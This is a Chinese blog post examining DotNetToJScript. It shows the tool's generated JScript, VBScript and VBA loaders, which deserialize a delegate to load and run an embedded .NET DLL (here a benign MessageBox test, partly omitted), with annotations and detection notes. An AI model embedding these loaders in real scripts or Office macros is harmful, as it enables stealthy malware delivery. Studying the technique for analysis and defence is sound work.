【逆向】DotNetToJScript-反序列化加载.NET程序

前言

最近分析了一个HTML样本,其中的JS代码是用开源工具"DotNetToJScript"生成的,其主要功能是通过反序列化加载并执行.NET程序,所以这里对"DotNetToJScript"工具做个简单记录。

项目结构

DotNetToJScript(主项目)

ExampleAssembly(测试程序项目)
其中测试程序是一个包含“TestClass”类的DLL文件,其无参构造函数中只是简单弹出一个MessageBox。

编译生成

可以自己编译,也可以直接下载Release版,如果报错可以参考以下方法解决:
报错1: 缺少程序集引用NDesk.Options
解决方法:需要添加引用NDesk.Options
下载地址:http://www.ndesk.org/Options
解压缩,工程-添加引用-浏览-\ndesk-options-0.2.1.bin\ndesk-options-0.2.1.bin\lib\ndesk-options\NDesk.Options.dll
指定目标框架为.NET Framework 2.0,重新编译即可

 

报错2: 缺少程序集引用Linq
解决方法:添加对System.Core.dll 3.5的引用
位置: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Core.dll

生成后在两个项目各自的bin目录下会分别得到DotNetToJScript.exe和ExampleAssembly.dll

使用示例

使用"ExampleAssembly.dll"作为测试Payload

ToJS

1 C:\Users\Sunset\Desktop\DotNetToJScript-master\DotNetToJScript\bin\Debug>DotNetToJScript.exe -o Test.js ExampleAssembly.dll
   // Empty stub in this generated output; it is called once at the start of the
   // try block below and does nothing here.
 1 function setversion() {
 2 }
   // Error sink used by the catch block. It is empty, so any exception reaching
   // the catch (e.message) is silently discarded and the script fails without a trace.
 3 function debug(s) {}
 4 
   // Decodes the base64 string b into a System.IO.MemoryStream positioned at 0,
   // using only .NET classes reachable from script through COM (ActiveXObject).
   // The numbered suffixes (GetByteCount_2, GetBytes_4) are the COM-visible
   // overload names of the .NET methods.
   // Defender note: a script host creating these System.* ProgIDs is the
   // characteristic indicator of this loader.
 5 function base64ToStream(b) {
 6     var enc = new ActiveXObject("System.Text.ASCIIEncoding");
 7     var length = enc.GetByteCount_2(b);
 8     var ba = enc.GetBytes_4(b);
 9     var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
       // ba is replaced by the decoded bytes.
10     ba = transform.TransformFinalBlock(ba, 0, length);
11     var ms = new ActiveXObject("System.IO.MemoryStream");
       // The byte count is derived from the input length, not from the decoded
       // array, so it assumes unpadded base64 (length a multiple of 4); the blob
       // shown below ends without '=' padding.
12     ms.Write(ba, 0, (length / 4) * 3);
13     ms.Position = 0;
14     return ms;
15 }
16 
   // Base64 of a BinaryFormatter object graph. The visible first line decodes to
   // the type name "System.DelegateSerializationHolder" and the last line to
   // "System.Reflection.Assembly Load(Byte[])": the graph carries a delegate to
   // Assembly.Load(Byte[]); the elided middle presumably holds the bytes of the
   // DLL passed to the tool (ExampleAssembly.dll here).
17 var serialized_obj = 
18 "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
19 "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
20 "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
21 "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
22 //part omitted
23 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
24 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
25 "AAAAAAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVm"+
26 "bGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
   // Name of the type instantiated from the loaded assembly (the TestClass of
   // ExampleAssembly, whose parameterless constructor shows the MessageBox).
27 var entry_class = 'TestClass';
28 
   // Everything runs inside one try; on failure only the no-op debug() is called.
29 try {
30     setversion();
31     //decode the base64 blob into a MemoryStream
32     var stm = base64ToStream(serialized_obj);
33     var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
34     var al = new ActiveXObject('System.Collections.ArrayList');
35     //deserialize: reconstructs the delegate object from the stream
36     var d = fmt.Deserialize_2(stm);
       // al becomes the one-element (null) argument array handed to DynamicInvoke.
37     al.Add(undefined);
38     //DynamicInvoke runs the delegate (Assembly.Load on the embedded bytes) and
       //returns the Assembly; CreateInstance then runs TestClass's parameterless
       //constructor, which shows the MessageBox.
       //Defender note: BinaryFormatter.Deserialize on script-supplied data
       //followed by DynamicInvoke is the core of this technique.
39     var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
40     
41 } catch (e) {
42     debug(e.message);
43 }

ToVBS

1 C:\Users\Sunset\Desktop\DotNetToJScript-master\DotNetToJScript\bin\Debug>DotNetToJScript.exe -l vbscript -o Test.vbs ExampleAssembly.dll
   ' Error sink; empty, so the Err.Description passed in by the top-level
   ' error check is discarded.
 1 Sub DebugPrint(s)
 2 End Sub
 3 
   ' Empty stub in this generated output; called once before Run.
 4 Sub SetVersion
 5 End Sub
 6 
   ' Decodes the base64 string b into a System.IO.MemoryStream positioned at 0,
   ' using .NET classes reachable from script through COM (CreateObject).
   ' Same logic as the JScript version; the decode and write are folded into one
   ' statement. The numbered suffixes are the COM-visible overload names.
   ' Defender note: a script host creating these System.* ProgIDs is the
   ' characteristic indicator of this loader.
 7 Function Base64ToStream(b)
 8   Dim enc, length, ba, transform, ms
 9   Set enc = CreateObject("System.Text.ASCIIEncoding")
10   length = enc.GetByteCount_2(b)
11   Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")
12   Set ms = CreateObject("System.IO.MemoryStream")
     ' Byte count is derived from the input length ((length / 4) * 3), so this
     ' assumes unpadded base64; ba is declared but not used.
13   ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
14   ms.Position = 0
15   Set Base64ToStream = ms
16 End Function
17 
   ' Decodes and deserializes the embedded BinaryFormatter payload, then
   ' instantiates entry_class from the loaded assembly. No error handling of
   ' its own: the caller enables On Error Resume Next before calling Run.
18 Sub Run
19 Dim s, entry_class
   ' Base64 BinaryFormatter graph: the first line decodes to the type name
   ' "System.DelegateSerializationHolder" and the last to
   ' "System.Reflection.Assembly Load(Byte[])"; the elided middle presumably
   ' holds the bytes of the DLL passed to the tool.
20 s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"
21 s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"
22 s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"
23 s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"
24 'part omitted
25 s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
26 s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
27 s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
28 s = s & "AAAAAAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVm"
29 s = s & "bGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"
   ' Type instantiated from the loaded assembly (TestClass of ExampleAssembly).
30 entry_class = "TestClass"
31 
32 Dim fmt, al, d, o
33 Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
34 Set al = CreateObject("System.Collections.ArrayList")
   ' al becomes the one-element (Empty) argument array handed to DynamicInvoke.
35 al.Add Empty
36 'essentially the same as the JS code: deserialize the delegate, invoke it
   '(Assembly.Load on the embedded bytes), then run entry_class's
   'parameterless constructor.
   'Defender note: BinaryFormatter.Deserialize on script-supplied data followed
   'by DynamicInvoke is the core of this technique.
37 Set d = fmt.Deserialize_2(Base64ToStream(s))
38 Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
39 End Sub
40 
   ' Entry sequence: errors are suppressed for the whole of Run and only
   ' inspected afterwards, where they are passed to the no-op DebugPrint.
41 SetVersion
42 On Error Resume Next
43 Run
44 If Err.Number <> 0 Then
45   DebugPrint Err.Description
46   Err.Clear
47 End If

ToVBA

1 C:\Users\Sunset\Desktop\DotNetToJScript-master\DotNetToJScript\bin\Debug>DotNetToJScript.exe -l vba -o Test.txt ExampleAssembly.dll
   ' Error sink; empty, so the Err.Description passed in at the end of Run is discarded.
 1 Sub DebugPrint(s)
 2 End Sub
 3 
   ' Converts a hex string to a byte array without any .NET object: an MSXML DOM
   ' element with DataType "bin.hex" decodes the text and NodeTypedValue returns
   ' the bytes. Because of On Error Resume Next, a failure here leaves the
   ' result unassigned (Empty) rather than raising to the caller.
 4 Private Function decodeHex(hex)
 5     On Error Resume Next
 6     Dim DM, EL
 7     Set DM = CreateObject("Microsoft.XMLDOM")
 8     Set EL = DM.createElement("tmp")
 9     EL.DataType = "bin.hex"
10     EL.Text = hex
11     decodeHex = EL.NodeTypedValue
12 End Function
13 
   ' VBA variant of the loader: hex-decodes the BinaryFormatter payload, obtains
   ' the .NET COM classes (registered, or registration-free via an activation
   ' context), deserializes the delegate and instantiates entry_class.
   ' entry_class, manifest, ax and i are never declared (no Option Explicit
   ' visible), so they are implicit Variants.
14 Function Run()
       ' Every failure below is suppressed until the Err check at the end; the
       ' "stm Is Nothing" test relies on this (a failed CreateObject leaves stm
       ' unset instead of raising).
15     On Error Resume Next
16 
   ' Hex-encoded BinaryFormatter graph. Readable type names are visible in the
   ' hex: "System.DelegateSerializationHolder" at the start and
   ' "System.Reflection.Assembly Load(Byte[])" at the end; the elided middle
   ' presumably holds the bytes of the DLL passed to the tool.
17     Dim s As String
18     s = "0001000000FFFFFFFF010000000000000004010000002253797374656D2E44656C656761746553657269616C697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300303033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E7472792253797374656D2E44656C65"
19     s = s & "6761746553657269616C697A6174696F6E486F6C6465722F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C64657209020000000903000000090400000004020000003053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727907000000047479706508"
20     s = s & "617373656D626C79067461726765741274617267657454797065417373656D626C790E746172676574547970654E616D650A6D6574686F644E616D650D64656C6567617465456E747279010102010101033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727906050000002F53797374656D2E52756E74696D65"
21     'part omitted
22     s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
23     s = s & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010D0000000400000009170000000906000000"
24     s = s & "0916000000061A0000002753797374656D2E5265666C656374696F6E2E417373656D626C79204C6F616428427974655B5D29080000000A0B"
25 
       ' Type instantiated from the loaded assembly (TestClass of ExampleAssembly).
26     entry_class = "TestClass"
27 
28     Dim stm As Object, fmt As Object, al As Object
       ' Probe whether the .NET COM ProgIDs are registered on this machine.
29     Set stm = CreateObject("System.IO.MemoryStream")
30 
       ' Fallback: registration-free COM activation. The manifest declares the
       ' mscorlib 4.0 classes (clrClass entries with their CLSIDs, runtime
       ' v4.0.30319) and Microsoft.Windows.ActCtx instantiates them from it,
       ' so the loader works even where these ProgIDs are not in the registry.
       ' Defender note: an Office macro creating Microsoft.Windows.ActCtx with
       ' an inline ManifestText containing clrClass entries is a strong signal.
31     If stm Is Nothing Then
32         manifest = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?><assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0""><assemblyIdentity name=""mscorlib"" version=""4.0.0.0"" publicKeyToken=""B77A5C561934E089"" /><clrClass clsid=""{D0CBA7AF-93F5-378A-BB11-2A5D9AA9C4D7}"" progid=""System.Runtime.Ser"
33         manifest = manifest & "ialization.Formatters.Binary.BinaryFormatter"" threadingModel=""Both"" name=""System.Runtime.Serialization.Formatters.Binary.BinaryFormatter"" runtimeVersion=""v4.0.30319"" /><clrClass clsid=""{8D907746-455E-39A7-BD31-BC9F81468347}"" progid=""System.Collections.ArrayList"" threadingModel=""Both"" name=""System.Co"
34         manifest = manifest & "llections.ArrayList"" runtimeVersion=""v4.0.30319"" /><clrClass clsid=""{8D907846-455E-39A7-BD31-BC9F81468347}"" progid=""System.Text.ASCIIEncoding"" threadingModel=""Both"" name=""System.Text.ASCIIEncoding"" runtimeVersion=""v4.0.30319"" /><clrClass clsid=""{8D907846-455E-39A7-BD31-BC9F81488347}"" progid=""System."
35         manifest = manifest & "Security.Cryptography.FromBase64Transform"" threadingModel=""Both"" name=""System.Security.Cryptography.FromBase64Transform"" runtimeVersion=""v4.0.30319"" /><clrClass clsid=""{8D907846-455E-39A7-BD31-BC9F81468B47}"" progid=""System.IO.MemoryStream"" threadingModel=""Both"" name=""System.IO.MemoryStream"" runtimeV"
36         manifest = manifest & "ersion=""v4.0.30319"" /></assembly>"
37 
38         Set ax = CreateObject("Microsoft.Windows.ActCtx")
39         ax.ManifestText = manifest
40         
41         Set stm = ax.CreateObject("System.IO.MemoryStream")
42         Set fmt = ax.CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
43         Set al = ax.CreateObject("System.Collections.ArrayList")
44     Else
           ' ProgIDs are registered: plain CreateObject for the remaining classes.
45         Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
46         Set al = CreateObject("System.Collections.ArrayList")
47     End If
48 
       ' Decode the hex payload and copy it into the stream byte by byte.
       ' If decodeHex failed silently, dec is Empty and the loop does nothing.
49     Dim dec
50     dec = decodeHex(s)
51 
52     For Each i In dec
53         stm.WriteByte i
54     Next i
55 
56     stm.Position = 0
57 
       ' n is declared but never used.
58     Dim n As Object, d As Object, o As Object
       ' Reconstruct the delegate from the stream.
59     Set d = fmt.Deserialize_2(stm)
       ' al becomes the one-element (Empty) argument array handed to DynamicInvoke.
60     al.Add Empty
61     'essentially the same as the JS code: DynamicInvoke runs the delegate
       '(Assembly.Load on the embedded bytes) and returns the Assembly;
       'CreateInstance then runs entry_class's parameterless constructor.
       'Defender note: BinaryFormatter.Deserialize on macro-supplied data followed
       'by DynamicInvoke is the core of this technique.
62     Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
63     
       ' Only now are suppressed errors examined, and they go to the no-op DebugPrint.
64     If Err.Number <> 0 Then
65       DebugPrint Err.Description
66       Err.Clear
67     End If
68 End Function

参考资料

https://github.com/tyranid/DotNetToJScript
https://bbs.pediy.com/thread-252293.htm
https://patrilic.top/2020/03/10/DotNetToJScript%20&&%20GadgetToJScript/#0x01-DotNetToJScript
https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8JS%E5%8A%A0%E8%BD%BD.Net%E7%A8%8B%E5%BA%8F/
